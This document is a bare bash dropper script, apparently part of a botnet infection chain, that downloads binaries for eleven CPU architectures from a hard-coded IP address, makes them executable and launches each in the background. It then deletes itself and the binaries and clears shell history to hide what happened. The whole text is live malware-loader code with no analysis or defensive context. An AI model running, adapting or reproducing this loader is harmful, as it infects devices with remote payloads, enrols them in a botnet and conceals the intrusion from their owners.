#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://176.65.139.228:6677/bins/x86; wget http://176.65.139.228:6677/bins/x32; wget http://176.65.139.228:6677/bins/mips; wget http://176.65.139.228:6677/bins/mipsel; wget http://176.65.139.228:6677/bins/arm7; wget http://176.65.139.228:6677/bins/sh4; wget http://176.65.139.228:6677/bins/arm6; wget http://176.65.139.228:6677/bins/ppc; wget http://176.65.139.228:6677/bins/m68k; wget http://176.65.139.228:6677/bins/arm4; wget http://176.65.139.228:6677/bins/arm5
chmod +x x86 x32 mips mipsel arm7 sh4 arm6 ppc m68k arm4 arm5
./x86 || true &
./x32 || true &
./mips || true &
./mipsel || true &
./arm7 || true &
./sh4 || true &
./arm6 || true &
./ppc || true &
./m68k || true &
./arm4 || true &
./arm5 || true &
sleep 10
rm -f Exodus.sh
rm -f x86 x32 mips mipsel arm7 sh4 arm6 ppc m68k arm4 arm5
history -c
